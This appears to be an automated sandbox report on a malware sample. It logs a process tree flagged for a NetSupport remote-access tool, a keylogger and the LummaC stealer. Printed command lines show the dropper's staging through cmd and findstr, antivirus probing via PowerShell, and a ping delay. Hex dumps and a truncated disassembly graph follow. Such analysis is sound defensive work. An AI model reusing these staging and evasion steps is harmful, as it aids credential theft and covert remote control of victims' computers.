                                                                                                                            2023-03-21 07:00:13 UTC4819INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:13 UTC4835INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4851INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0
                                                                                                                            2023-03-21 07:00:13 UTC4867INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4867INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: CA_|0
                                                                                                                            2023-03-21 07:00:13 UTC4883INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii:
                                                                                                                            2023-03-21 07:00:13 UTC4898INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:13 UTC4914INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: `
                                                                                                                            2023-03-21 07:00:13 UTC4930INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 d8 83 43 02 00 00 00 00 41 ff 5f 9b 7c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00
                                                                                                                            Data Ascii: 0CA_|
                                                                                                                            2023-03-21 07:00:13 UTC4946INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 30 00
                                                                                                                            Data Ascii: 0


                                                                                                                            Statistics

                                                                                                                            CPU Usage

                                                                                                                            Click to jump to process

                                                                                                                            Memory Usage

                                                                                                                            Click to jump to process

                                                                                                                            High Level Behavior Distribution

                                                                                                                            Click to dive into process behavior distribution

                                                                                                                            Behavior

                                                                                                                            Click to jump to process

                                                                                                                            System Behavior

                                                                                                                            General

                                                                                                                            Target ID:0
                                                                                                                            Start time:08:00:00
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\Desktop\0ud2VlMOvF.exe
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:417792 bytes
                                                                                                                            MD5 hash:2DB4E85F42AB1B1B22A6829F273566A7
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000000.00000002.627325284.0000000000618000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:1
                                                                                                                            Start time:08:00:07
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe"
                                                                                                                            Imagebase:0xe30000
                                                                                                                            File size:106864 bytes
                                                                                                                            MD5 hash:2286E6E9C894051C0E4A856B42AD7DCD
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.827413930.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.828413745.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000000.319169996.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.828711123.000000006CDC0000.00000002.00000001.01000000.0000000B.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000001.00000002.828372775.0000000011194000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe, Author: Joe Security
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 23%, ReversingLabs
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:2
                                                                                                                            Start time:08:00:21
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe"
                                                                                                                            Imagebase:0xe30000
                                                                                                                            File size:106864 bytes
                                                                                                                            MD5 hash:2286E6E9C894051C0E4A856B42AD7DCD
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.350058442.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000000.347982915.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.350451270.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000002.00000002.350416084.0000000011194000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:3
                                                                                                                            Start time:08:00:30
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Roaming\NetHelper_v_4.7.9.8\client32.exe"
                                                                                                                            Imagebase:0xe30000
                                                                                                                            File size:106864 bytes
                                                                                                                            MD5 hash:2286E6E9C894051C0E4A856B42AD7DCD
                                                                                                                            Has elevated privileges:false
                                                                                                                            Has administrator privileges:false
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.368688274.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000000.367232590.0000000000E32000.00000002.00000001.01000000.00000005.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.368979040.00000000111E2000.00000004.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: 00000003.00000002.368942181.0000000011194000.00000002.00000001.01000000.00000006.sdmp, Author: Joe Security
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:9
                                                                                                                            Start time:08:02:31
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\rrrr.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:"C:\Users\user\AppData\Local\Temp\rrrr.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:1352627835 bytes
                                                                                                                            MD5 hash:0AC85848A3421C877A87DCD5CD1A2A8E
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000009.00000000.626833911.0000000000401000.00000020.00000001.01000000.0000000E.sdmp, Author: Joe Security
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:10
                                                                                                                            Start time:08:02:39
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\SETUP_44067\Engine.exe /TH_ID=_2692 /OriginExe="C:\Users\user\AppData\Local\Temp\rrrr.exe"
                                                                                                                            Imagebase:0x400000
                                                                                                                            File size:664720 bytes
                                                                                                                            MD5 hash:8F234EB6FAF146795C790D8191A0DC1F
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:Borland Delphi
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 0%, ReversingLabs
                                                                                                                            Reputation:low

                                                                                                                            General

                                                                                                                            Target ID:12
                                                                                                                            Start time:08:02:40
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Windows\system32\CmD.exe /c cmd < Highlights
                                                                                                                            Imagebase:0x7ff61e220000
                                                                                                                            File size:232960 bytes
                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:13
                                                                                                                            Start time:08:02:40
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Windows\System32\conhost.exe
                                                                                                                            Wow64 process (32bit):false
                                                                                                                            Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                            Imagebase:0x7ff7c72c0000
                                                                                                                            File size:625664 bytes
                                                                                                                            MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:14
                                                                                                                            Start time:08:02:40
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:cmd
                                                                                                                            Imagebase:0xd90000
                                                                                                                            File size:232960 bytes
                                                                                                                            MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:16
                                                                                                                            Start time:08:02:42
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:powershell get-process avastui
                                                                                                                            Imagebase:0x380000
                                                                                                                            File size:430592 bytes
                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:17
                                                                                                                            Start time:08:02:48
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:powershell get-process avgui
                                                                                                                            Imagebase:0x380000
                                                                                                                            File size:430592 bytes
                                                                                                                            MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:.Net C# or VB.NET
                                                                                                                            Reputation:high

                                                                                                                            General

                                                                                                                            Target ID:18
                                                                                                                            Start time:08:02:51
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Windows\SysWOW64\findstr.exe
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:findstr /V /R "^cruzVehicleRespectiveDiane$" Players
                                                                                                                            Imagebase:0xbc0000
                                                                                                                            File size:29696 bytes
                                                                                                                            MD5 hash:8B534A7FC0630DE41BB1F98C882C19EC
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                            General

                                                                                                                            Target ID:19
                                                                                                                            Start time:08:02:51
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:4744\\Close.exe.pif 4744\\m
                                                                                                                            Imagebase:0xf0000
                                                                                                                            File size:947288 bytes
                                                                                                                            MD5 hash:0162A97ED477353BC35776A7ADDFFD5C
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.742951268.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.714649771.0000000003AE8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.717533692.0000000003B56000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.742876893.0000000003B61000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.714824323.0000000004BF1000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.743032494.0000000004C77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.717322865.0000000003BB0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.743009888.0000000003B3E000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.743109153.0000000004C28000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.714597273.00000000053F9000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000013.00000003.714476620.0000000004C29000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                            Antivirus matches:
                                                                                                                            • Detection: 4%, ReversingLabs

                                                                                                                            General

                                                                                                                            Target ID:20
                                                                                                                            Start time:08:02:51
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Windows\SysWOW64\PING.EXE
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:ping localhost -n 8
                                                                                                                            Imagebase:0x20000
                                                                                                                            File size:18944 bytes
                                                                                                                            MD5 hash:70C24A306F768936563ABDADB9CA9108
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language

                                                                                                                            General

                                                                                                                            Target ID:21
                                                                                                                            Start time:08:03:12
                                                                                                                            Start date:21/03/2023
                                                                                                                            Path:C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif
                                                                                                                            Wow64 process (32bit):true
                                                                                                                            Commandline:C:\Users\user\AppData\Local\Temp\fhenve3c.gto\4744\Close.exe.pif
                                                                                                                            Imagebase:0xf0000
                                                                                                                            File size:947288 bytes
                                                                                                                            MD5 hash:0162A97ED477353BC35776A7ADDFFD5C
                                                                                                                            Has elevated privileges:true
                                                                                                                            Has administrator privileges:true
                                                                                                                            Programmed in:C, C++ or other language
                                                                                                                            Yara matches:
                                                                                                                            • Rule: JoeSecurity_LummaCStealer, Description: Yara detected LummaC Stealer, Source: 00000015.00000002.827312389.0000000001000000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security

                                                                                                                            Disassembly

                                                                                                                            Reset < >

                                                                                                                              Execution Graph

                                                                                                                              Execution Coverage:2.5%
                                                                                                                              Dynamic/Decrypted Code Coverage:66.6%
                                                                                                                              Signature Coverage:27.1%
                                                                                                                              Total number of Nodes:476
                                                                                                                              Total number of Limit Nodes:25
                                                                                                                              execution_graph 33860 960a70 33863 972c9c 33860->33863 33866 975822 33863->33866 33865 960a79 33867 97582d RtlFreeHeap 33866->33867 33871 975856 _free 33866->33871 33868 975842 33867->33868 33867->33871 33872 976492 14 API calls _free 33868->33872 33870 975848 GetLastError 33870->33871 33871->33865 33872->33870 33873 41d4c9 33875 41d4cd 33873->33875 33876 41d50c 33875->33876 33877 41d4ed Sleep 33875->33877 33879 425e22 33875->33879 33878 41d502 33877->33878 33878->33875 33878->33876 33880 425e2e __locking 33879->33880 33881 425e46 33880->33881 33891 425e65 _memset 33880->33891 33892 41b805 68 API calls _raise 33881->33892 33883 425e4b 33893 41ad0f 68 API calls 2 library calls 33883->33893 33885 425ed7 RtlAllocateHeap 33885->33891 33887 425e5b __locking 33887->33875 33891->33885 33891->33887 33894 4240a7 68 API calls 2 library calls 33891->33894 33895 4248f4 5 API calls 2 library calls 33891->33895 33896 425f1e LeaveCriticalSection ___lock_fhandle 33891->33896 33897 420513 68 API calls __amsg_exit 33891->33897 33892->33883 33894->33891 33895->33891 33896->33891 33897->33891 33898 41ffb9 TlsGetValue 33899 41ffed GetModuleHandleA 33898->33899 33900 41ffcc 33898->33900 33901 420021 33899->33901 33902 41fffe 33899->33902 33900->33899 33903 41ffd6 TlsGetValue 33900->33903 33910 41ff4d 68 API calls 2 library calls 33902->33910 33906 41ffe1 33903->33906 33905 420003 33905->33901 33908 420007 GetProcAddress 33905->33908 33906->33899 33907 41ffe5 33906->33907 33907->33901 33909 420017 RtlEncodePointer 33907->33909 33908->33907 33909->33901 33910->33905 33911 41c9fb 33912 41caa8 33911->33912 33923 41ca09 33911->33923 33937 420513 68 API calls __amsg_exit 33912->33937 33914 41caae 33938 41b805 68 API calls _raise 33914->33938 33917 41cab4 33920 41ca6c RtlAllocateHeap 33920->33923 33921 41ca1e 33921->33923 33930 4220c8 68 API calls __FF_MSGBANNER 33921->33930 33931 421f28 68 API calls 6 library calls 33921->33931 33932 420fc1 GetModuleHandleA GetProcAddress ExitProcess ___crtCorExitProcess 33921->33932 33923->33920 33923->33921 33924 41ca93 33923->33924 33927 41ca91 33923->33927 33929 41ca9f 33923->33929 33933 41c9ac 68 API calls 4 library calls 33923->33933 33934 420513 68 API calls __amsg_exit 33923->33934 33935 41b805 68 API calls _raise 33924->33935 33936 41b805 68 API calls _raise 33927->33936 33930->33921 33931->33921 33933->33923 33934->33923 33935->33927 33936->33929 33937->33914 33938->33917 33939 41c5ea 33994 421294 33939->33994 33941 41c5f6 GetStartupInfoA GetProcessHeap HeapAlloc 33942 41c635 GetVersionExA 33941->33942 33943 41c628 33941->33943 33944 41c653 GetProcessHeap HeapFree 33942->33944 33945 41c645 GetProcessHeap HeapFree 33942->33945 34059 41c585 68 API calls 2 library 